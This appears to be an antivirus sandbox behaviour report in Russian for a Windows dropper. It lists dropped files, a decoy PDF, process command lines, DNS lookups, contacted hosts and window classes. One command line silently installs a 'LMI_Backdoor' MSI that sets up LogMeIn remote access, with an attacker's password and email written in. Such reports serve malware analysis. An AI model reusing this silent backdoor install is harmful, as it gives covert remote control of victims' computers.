Техническая информация
- '%TEMP%\ejecutar.exe'
- '<SYSTEM32>\msiexec.exe' /V
- '<SYSTEM32>\msiexec.exe' -Embedding AD2E897DDCCE4D57A4CFC0C1D047F5B2
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\ejecutar.bat" "
- '<SYSTEM32>\msiexec.exe' /i "%TEMP%\LMI_Backdoor_by_Lordblacksuca.msi" /quiet USERPASSWORD=0971111923 USERVERIFYPWD=0971111923 USEREMAIL=geomil_27@hotmail.com USERWEBPASSWORD=fucktop12 LicenseType=free
- %APPDATA%\Microsoft\CryptnetUrlCache\Content\A8FABA189DB7D25FBA7CAC806625FD30
- %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\A8FABA189DB7D25FBA7CAC806625FD30
- %APPDATA%\Microsoft\CryptnetUrlCache\Content\60E31627FDA0A46932B0E5948949F2A5
- %WINDIR%\Installer\MSI2.tmp
- %WINDIR%\Installer\MSI5.tmp
- %WINDIR%\Installer\MSI4.tmp
- %WINDIR%\Installer\MSI3.tmp
- %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\60E31627FDA0A46932B0E5948949F2A5
- %TEMP%\LMI_Backdoor_by_Lordblacksuca.msi
- %TEMP%\taskkill.exe
- %TEMP%\logmein-patch.exe
- %TEMP%\TARIFAS I WU.pdf
- %WINDIR%\Installer\2cb55.msi
- %TEMP%\1.tmp\ejecutar.bat
- %TEMP%\ejecutar.exe
- %WINDIR%\Installer\MSI4.tmp
- %WINDIR%\Installer\MSI2.tmp
- 'cs######4-crl.verisign.com':80
- 'se####.logmein.com':443
- 'wp#d':80
- 'crl.verisign.com':80
- cs######4-crl.verisign.com/CSC3-2004.crl
- crl.verisign.com/pca3.crl
- wp#d/wpad.dat
- DNS ASK cs######4-crl.verisign.com
- DNS ASK se####.logmein.com
- DNS ASK wp#d
- DNS ASK crl.verisign.com
- ClassName: 'LogMeInGui' WindowName: 'LogMeInGui'
- ClassName: 'LogMeInToolkit' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'